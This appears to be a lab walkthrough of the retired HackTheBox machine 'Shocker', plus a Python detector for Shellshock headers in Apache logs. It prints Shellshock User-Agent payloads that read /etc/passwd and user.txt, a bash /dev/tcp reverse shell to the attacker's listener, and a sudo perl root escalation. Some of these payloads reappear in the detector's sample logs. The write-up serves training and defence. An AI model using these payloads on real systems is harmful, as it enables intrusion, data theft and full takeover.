HTB Walkthrough: Shocker (retired)

Shraddha M.
3 min read · Jan 23, 2021

Shocker is a retired box on HTB. It is on TJ Null’s list of OSCP-like boxes.

Hostname: Shocker | Difficulty Level: Easy | Operating System: Linux

NMAP scan

We can see port 80 and port 2222 open.

There are several rabbit holes, such as the bug.jpg image (tried with the ‘steghide’ tool) and the known vulnerabilities of OpenSSH 7.2p2 (checked with ‘searchsploit’). There are other ways to exploit this machine as well, such as the Nmap NSE script (see IppSec’s video).

Since the web server is Apache, we use gobuster with the dirb wordlist for further enumeration.

Running gobuster to enumerate port 80

Apache uses CGI to hand requests off to scripts written in other languages, such as bash or Perl. Run gobuster again on ‘/cgi-bin’, this time looking for files with extensions (-x flag) such as .sh and .pl.

Running gobuster to enumerate /cgi-bin

The machine is named ‘Shocker’ and it has a CGI script running, so check whether it is vulnerable to Shellshock. To confirm this, modify the ‘User-Agent’ header of the HTTP request as below:

With the above, the response contains the /etc/passwd file. From it you can see that a user named ‘shelly’ exists, along with that user’s home directory.

A simpler way to get the user.txt file is the following:

User-Agent: () { :;}; echo "NS:" $(</home/shelly/user.txt)

The user flag is returned in the ‘NS’ field of the response. Unfortunately, the root flag cannot be obtained the same way. (Note: user.txt may not be in the /home/shelly directory.) Let us try to get a reverse shell instead.

Exploitation

After some trial and error, the vulnerability was exploited by adding ‘echo’ to the User-Agent string (the echo emits the blank line that terminates the CGI response headers, so the command’s output is returned in the body). This can be confirmed by experimenting with the User-Agent string below:

User-Agent: () { :;}; echo; /bin/bash -c 'ping -c 3 10.10.10.56'

Set up a netcat listener on Kali (e.g. on port 9876). The following User-Agent gives a reverse shell as the user:

User-Agent: () { :;}; echo; /bin/bash -i >& /dev/tcp/<Kali IP>/9876 0>&1

Burpsuite request for reverse shell
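For the defensive side of the requests shown above, here is an added example that is not part of the original walkthrough: a small Python checker that scans Apache combined-format access log lines for the bash function-definition pattern (‘() {’) in the User-Agent or Referer field, which is how an injected Shellshock header appears in the web server log. The log lines are constructed samples modelled on this box; the field names and functions are the example’s own.

```python
import re
from typing import Dict, List, Optional

# Apache "combined" log format: host, ident, user, [time], "request",
# status, bytes, "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shellshock payloads begin with a bash function definition; tools vary the
# whitespace inside the parentheses and before the brace, so match loosely.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

# Constructed sample log (not captured from a real host): one benign hit on
# the CGI script, two injected headers, and a benign UA that merely contains "()".
SAMPLE_LOG = """\
10.10.14.5 - - [23/Jan/2021:10:01:02 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.5 - - [23/Jan/2021:10:01:09 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 2153 "-" "() { :;}; echo; /bin/bash -c 'cat /etc/passwd'"
10.10.14.5 - - [23/Jan/2021:10:01:15 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 500 0 "() { :;}; echo NS: x" "curl/7.74.0"
10.10.14.9 - - [23/Jan/2021:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0 () fake"
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def shellshock_hits(log_text: str) -> List[Dict[str, str]]:
    """Return one record per line whose User-Agent or Referer carries a
    Shellshock-style function definition; 'field' names the offending header."""
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ("agent", "referer"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append({"ip": rec["ip"], "time": rec["time"],
                             "request": rec["request"], "field": field,
                             "value": rec[field]})
                break  # one finding per line is enough
    return hits


if __name__ == "__main__":
    for h in shellshock_hits(SAMPLE_LOG):
        print(f"{h['time']} {h['ip']} {h['request']} [{h['field']}] {h['value']}")
```

Run it against a real access.log by replacing SAMPLE_LOG with the file contents; a hit on a 200 response to /cgi-bin is the case worth escalating, since it means the script executed the injected header.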

Privilege Escalation

Check sudo privileges.

shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl

A Google search for “perl privilege escalation” gives the Perl one-liner. Execute the following on the target machine:

shelly@Shocker:/$ sudo perl -e 'exec "/bin/bash";'

With the above sudo abuse you get a root shell and the root flag.
